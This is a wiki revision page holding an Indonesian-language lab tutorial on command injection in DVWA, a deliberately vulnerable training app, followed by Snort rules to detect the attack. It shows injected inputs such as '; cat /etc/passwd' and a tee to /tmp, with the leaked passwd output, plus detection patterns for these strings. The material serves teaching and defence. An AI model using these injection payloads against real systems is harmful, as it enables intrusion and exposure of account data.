Difference between revisions of "DVWA: Command Injection"

From OnnoWiki
Jump to navigation Jump to search
Line 58: Line 58:
 
  alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;)
 
  alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;)
 
  alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
 
  alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
  alert tcp any any -> 192.168.0.100 80 (msg:"cat+%2Fetc%2Fpasswd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
+
  alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
 +
alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)
  
 
sebaiknya pilih yang paling spesifik, jangan yang general.
 
sebaiknya pilih yang paling spesifik, jangan yang general.

Revision as of 19:42, 31 March 2017

  • Login ke DVWA
  • Klik Command Injection
  • Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
  • Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms


  • Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd


PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
..
..
dst
  • Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php


  • Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd


Snort Rule

Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut

alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;)
alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;)
alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)

sebaiknya pilih yang paling spesifik, jangan yang general.